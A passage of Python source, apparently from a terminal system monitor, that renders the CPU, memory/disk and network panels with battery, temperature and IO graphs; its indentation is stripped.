if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hh2: int = h - hh
mid_line: bool = False
temp: int = 0
unit: str = ""
if not CONFIG.cpu_single_graph and CONFIG.cpu_graph_upper != CONFIG.cpu_graph_lower:
mid_line = True
if h % 2: hh = floor(h / 2)
else: hh2 -= 1
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, (h if CONFIG.cpu_single_graph else hh), THEME.gradient["cpu"], cpu.cpu_upper, round_up_low=True)
if not CONFIG.cpu_single_graph:
Graphs.cpu["down"] = Graph(w - bw - 3, hh2, THEME.gradient["cpu"], cpu.cpu_lower, invert=CONFIG.cpu_invert_lower, round_up_low=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
			freq: str = f'{cpu.cpu_freq} MHz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_upper[-1])}'
if mid_line:
out += (f'{Mv.to(y+hh, x-1)}{THEME.cpu_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (w - bw - 3)}{THEME.div_line(Symbol.title_left)}'
f'{Mv.to(y+hh, x+((w-bw)//2)-((len(CONFIG.cpu_graph_upper)+len(CONFIG.cpu_graph_lower))//2)-4)}{THEME.main_fg}{CONFIG.cpu_graph_upper}{Mv.r(1)}▲▼{Mv.r(1)}{CONFIG.cpu_graph_lower}')
if not CONFIG.cpu_single_graph and Graphs.cpu.get("down"):
out += f'{Mv.to(y + hh + (1 * mid_line), x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_lower[-1])}'
out += (f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
temp, unit = temperature(cpu.cpu_temp[0][-1], CONFIG.temp_scale)
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{temp:>4}{THEME.main_fg}{unit}')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
temp, unit = temperature(cpu.cpu_temp[n][-1], CONFIG.temp_scale)
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[n][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][min_max(temp, 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}'
out += f'{temp:>4}{THEME.main_fg}{unit}'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
if CONFIG.show_uptime:
out += f'{Mv.to(y + (0 if not CONFIG.cpu_invert_lower or CONFIG.cpu_single_graph else h - 1), x + 1)}{THEME.graph_text}{Fx.trans("up " + cpu.uptime)}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
min_w: int = 36
min_h: int = 10
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
disks_io_h: int = 0
disks_io_order: List[str] = []
graph_speeds: Dict[str, int] = {}
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls.redraw = True
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if CONFIG.show_disks and mem.disks:
if CONFIG.show_io_stat or CONFIG.io_mode:
d_graph: List[str] = []
d_no_graph: List[str] = []
l_vals: List[Tuple[str, int, str, bool]] = []
if CONFIG.io_mode:
cls.disks_io_h = (cls.height - 2 - len(mem.disks)) // max(1, len(mem.disks_io_dict))
if cls.disks_io_h < 2: cls.disks_io_h = 1 if CONFIG.io_graph_combined else 2
else:
cls.disks_io_h = 1
if CONFIG.io_graph_speeds and not cls.graph_speeds:
try:
cls.graph_speeds = { spds.split(":")[0] : int(spds.split(":")[1]) for spds in list(i.strip() for i in CONFIG.io_graph_speeds.split(","))}
except (KeyError, ValueError):
errlog.error("Wrong formatting in io_graph_speeds variable. Using defaults.")
for name in mem.disks.keys():
if name in mem.disks_io_dict:
d_graph.append(name)
else:
d_no_graph.append(name)
continue
if CONFIG.io_graph_combined or not CONFIG.io_mode:
l_vals = [("rw", cls.disks_io_h, "available", False)]
else:
l_vals = [("read", cls.disks_io_h // 2, "free", False), ("write", cls.disks_io_h // 2, "used", True)]
Graphs.disk_io[name] = {_name : Graph(width=cls.disks_width - (6 if not CONFIG.io_mode else 0), height=_height, color=THEME.gradient[_gradient],
data=mem.disks_io_dict[name][_name], invert=_invert, max_value=cls.graph_speeds.get(name, 10), no_zero=True)
for _name, _height, _gradient, _invert in l_vals}
cls.disks_io_order = d_graph + d_no_graph
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if not "i" in Key.mouse:
Key.mouse["i"] = [[x + w - 10 + i, y-1] for i in range(2)]
out_misc += (f'{Mv.to(y-1, x + w - 11)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.io_mode else ""}'
f'{THEME.hi_fg("i")}{THEME.title("o")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
if CONFIG.io_mode:
for name in cls.disks_io_order:
item = mem.disks[name]
io_item = mem.disks_io_dict.get(name, {})
if Collector.collect_interrupt: return
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += Fx.trans(f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(str(item["used_percent"])) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["used_percent"]}%')
cy += 1
if io_item:
if cy > h - 1: break
if CONFIG.io_graph_combined:
if cls.disks_io_h <= 1:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io"] or "RW"}')
cy += cls.disks_io_h
else:
if cls.disks_io_h <= 3:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}{Mv.to(y+cy+1, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["read"](None if cls.redraw else mem.disks_io_dict[name]["read"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io_r"] or "R"}')
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy, x+cx-1)}{Graphs.disk_io[name]["write"](None if cls.redraw else mem.disks_io_dict[name]["write"][-1])}'
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy-1, x+cx-1)}{THEME.main_fg}{item["io_w"] or "W"}'
else:
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{Fx.trans(item["io"])}'
cy += 1
if cy > h - 1: break
if CONFIG.show_io_stat and name in Graphs.disk_io:
out += f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{Fx.ub}{" IO: " if big_disk else " IO " + Mv.l(2)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
if not big_disk and item["io"]:
out += f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{THEME.main_fg}{item["io"]}'
cy += 1
if cy > h - 1: break
out += Mv.to(y+cy, x+cx) + (f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U ")
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 3 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
min_w: int = 36
min_h: int = 6
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if net.address and w - len(net.nic[:10]) - len(net.address) - 20 > 15:
out_misc += (f'{Mv.to(y-1, x+7)}{THEME.net_box(Symbol.title_left)}{Fx.b}{THEME.title(net.address)}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None, round_up_low=True)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
